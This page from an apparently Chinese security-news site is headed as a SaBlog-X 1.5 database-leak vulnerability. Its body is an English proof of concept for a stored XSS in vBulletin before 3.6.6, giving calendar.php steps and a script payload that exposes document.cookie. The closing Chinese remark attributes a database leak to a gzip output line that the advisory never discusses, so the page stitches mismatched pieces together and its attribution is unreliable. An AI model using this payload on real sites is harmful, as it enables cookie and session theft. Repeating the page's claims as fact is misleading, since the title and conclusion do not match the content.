 |
SaBlog-X 1.5暴库漏洞 |
|
|
| SaBlog-X 1.5暴库漏洞 |
|
| 作者:绿光 文章来源:安全焦点 点击数: 更新时间:2007-5-24 13:45:46 |
|
以下是代码片段:
vendor site:http://www.vbulletin.com/
product:vbulletin < 3.6.6
bug: permanent xss
affected file: calendar.php
risk : medium
xss permanent ( must be loggued ) PoC :
http://127.0.0.1/vbulletin/calendar.php?do=add&type=single&c=1
--> fill up the title field with :
</title><script>alert(document.cookie)</script>
Event Date : ( some far away date ... like 2010 for exemple )
message : whatever .
when it's done look at the :"Request Reminder for this Event" link.
(it looks like this: http://127.0.0.1/vbulletin/calendar.php?do=addreminder&e=2)
if you click,your XSS will be executed .
reminder:
permanent xss are dangerous ...
see : http://en.wikipedia.org/wiki/Cross_site_scripting
regards laurent gaffi?
contact: laurent.gaffie[at]g/**/m/**/a/**/i/**/l.com
|
官方暂时未出补丁,这里我们可以清晰的看到爆库出在($options['gzipcompress'] && function_exists('ob_gzhandler')) ? ob_start('ob_gzhandler') : ob_start();
这里,有时间我会去跟这个漏洞!
|
|
| 文章录入:杰瑞 责任编辑:杰瑞 |
|
|
上一篇文章: 黑客技术:计算机十二种常用密码破解法
下一篇文章: 没有了 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
